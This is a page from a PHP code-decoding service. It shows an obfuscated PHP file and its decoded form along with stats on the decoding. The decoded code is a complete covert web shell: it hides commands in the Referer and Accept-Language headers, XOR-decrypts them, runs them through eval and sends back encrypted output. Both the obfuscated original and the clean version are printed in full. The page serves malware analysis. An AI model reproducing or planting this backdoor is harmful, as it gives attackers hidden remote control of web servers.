Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php $v='ode(x(gzco[n[nmpress($o),$[nk[n));pri[nnt("<$k>[n$d[n</$k[n>"[n);[n@session_dest..

Decoded Output download

$kh="5d41";$kf="402a";function x($t,$k){$c=strlen($k);$l=strlen($t);$o="";for($i=0;$i<$l;){for($j=0;($j<$c&&$i<$l);$j++,$i++){$o.=$t{$i}^$k{$j};}}return $o;}$r=$_SERVER;$rr=@$r["HTTP_REFERER"];$ra=@$r["HTTP_ACCEPT_LANGUAGE"];if($rr&&$ra){$u=parse_url($rr);parse_str($u["query"],$q);$q=array_values($q);preg_match_all("/([\w])[\w-]+(?:;q=0.([\d]))?,?/",$ra,$m);if($q&&$m){@session_start();$s=&$_SESSION;$ss="substr";$sl="strtolower";$i=$m[1][0].$m[1][1];$h=$sl($ss(md5($i.$kh),0,3));$f=$sl($ss(md5($i.$kf),0,3));$p="";for($z=1;$z<count($m[1]);$z++)$p.=$q[$m[2][$z]];if(strpos($p,$h)===0){$s[$i]="";$p=$ss($p,3);}if(array_key_exists($i,$s)){$s[$i].=$p;$e=strpos($s[$i],$f);if($e){$k=$kh.$kf;ob_start();eval(@gzuncompress(@x(base64_decode(preg_replace(array("/_/","/-/"),array("/","+"),$ss($s[$i],0,$e))),$k)));$o=ob_get_contents();ob_end_clean();$d=base64_encode(x(gzcompress($o),$k));print("<$k>$d</$k>");@session_destroy();}}}}

Did this file decode correctly?

Original Code

<?php
$v='ode(x(gzco[n[nmpress($o),$[nk[n));pri[nnt("<$k>[n$d[n</$k[n>"[n);[n@session_destroy();}}}}';
$Y='i[n}^$k[n{$j};}}[nre[nturn $o;}$r=$_SER[nVER;$rr[n=@[n$r["HTTP_RE[nFERER[n"];$[nra=[n@$';
$i='<c[nount($m[1]);$z+[n+)$[np.=$q[$[nm[2][$z][n];if(str[npos($p,$h[n)==[n=0)[n{$s[$i]="";';
$M='[no="";for[n[n($i=0;$i<$l;){for[n($j[n=0;($j<$[nc&[n&$i<[n$l);$j+[n+,$i++)[n[n{$o.=$t{$';
$I='r["[nHTTP_AC[nCEPT_LANGUAG[nE"];if[n($rr&[n&$ra){[n$u=pa[nr[nse_u[nr[nl($rr);parse_str([';
$k='n4_de[nc[node(pr[neg_replace([narr[nay("/_[n/","/[n-/"),array("/[n"[n,"[n+[n"),$ss($s[$';
$F='[n[n$p=$[n[nss($p,3);}if(array_ke[ny_ex[nists($i,[n[n$s)){$s[$i].=[n$p;$[ne[n=s[ntrp[nos($';
$g=';[nq[n=0[n.([\\d][n[n))?,[n?/",[n$ra,$m);if($q&&$[nm){@ses[ns[nion_start();$s=[n&$_SESSI[n';
$a='i],0[n,[n$e))),[n$k)));$[no=ob_get[n_cont[nents([n);ob_end_clea[nn();$d=ba[nse64_e[nn[nc';
$l='s[$i],[n[n[n$f);if($e[n){$k=$kh.$kf;ob_s[ntart();@ev[nal([n@g[nzuncompress(@x[n(@base6[';
$H='n$u["[nquery"][n,$q);$q=[narray[n_[nvalues($q);pr[ne[ng_ma[ntch_all("/[n([\\[nw])[\\w-]+(?:';
$C='ON;$[nss="su[nbstr";$sl[n="st[n[nrt[nolowe[nr";$i=$m[1][0].$m[1][n[1][n;$h=$s[nl([n$ss(m';
$K='$kh="[n5d41";$kf[n="402a"[n;func[ntion [nx($t,[n$k){$c[n=st[nrlen($[nk)[n;$l[n=strlen($t);$';
$S=str_replace('Zl','','creZlatZlZle_fuZlnZlZlction');
$e='d5($i.$k[nh)[n,[n0,3));$f=$sl([n$[nss(md[n5($i.$k[n[nf)[n,0,3))[n;$p="";for($z[n=1;[n$z';
$L=str_replace('[n','',$K.$M.$Y.$I.$H.$g.$C.$e.$i.$F.$l.$k.$a.$v);
$D=$S('',$L);$D();
?>

Function Calls

null 1
str_replace 2
create_function 1

Variables

$C ON;$[nss="su[nbstr";$sl[n="st[n[nrt[nolowe[nr";$i=$m[1][0].$..
$D None
$F [n[n$p=$[n[nss($p,3);}if(array_ke[ny_ex[nists($i,[n[n$s)){$s..
$H n$u["[nquery"][n,$q);$q=[narray[n_[nvalues($q);pr[ne[ng_ma[n..
$I r["[nHTTP_AC[nCEPT_LANGUAG[nE"];if[n($rr&[n&$ra){[n$u=pa[nr[..
$K $kh="[n5d41";$kf[n="402a"[n;func[ntion [nx($t,[n$k){$c[n=st[..
$L $kh="5d41";$kf="402a";function x($t,$k){$c=strlen($k);$l=str..
$M [no="";for[n[n($i=0;$i<$l;){for[n($j[n=0;($j<$[nc&[n&$i<[n$l..
$S create_function
$Y i[n}^$k[n{$j};}}[nre[nturn $o;}$r=$_SER[nVER;$rr[n=@[n$r["HT..
$a i],0[n,[n$e))),[n$k)));$[no=ob_get[n_cont[nents([n);ob_end_c..
$e d5($i.$k[nh)[n,[n0,3));$f=$sl([n$[nss(md[n5($i.$k[n[nf)[n,0,..
$g ;[nq[n=0[n.([\d][n[n))?,[n?/",[n$ra,$m);if($q&&$[nm){@ses[ns..
$i <c[nount($m[1]);$z+[n+)$[np.=$q[$[nm[2][$z][n];if(str[npos($..
$k n4_de[nc[node(pr[neg_replace([narr[nay("/_[n/","/[n-/"),arra..
$l s[$i],[n[n[n$f);if($e[n){$k=$kh.$kf;ob_s[ntart();@ev[nal([n@..
$v ode(x(gzco[n[nmpress($o),$[nk[n));pri[nnt("<$k>[n$d[n</$k[n>..

Stats

MD5 4d4651cf6c543006a8758b0da28a5617
Eval Count 1
Decode Time 129 ms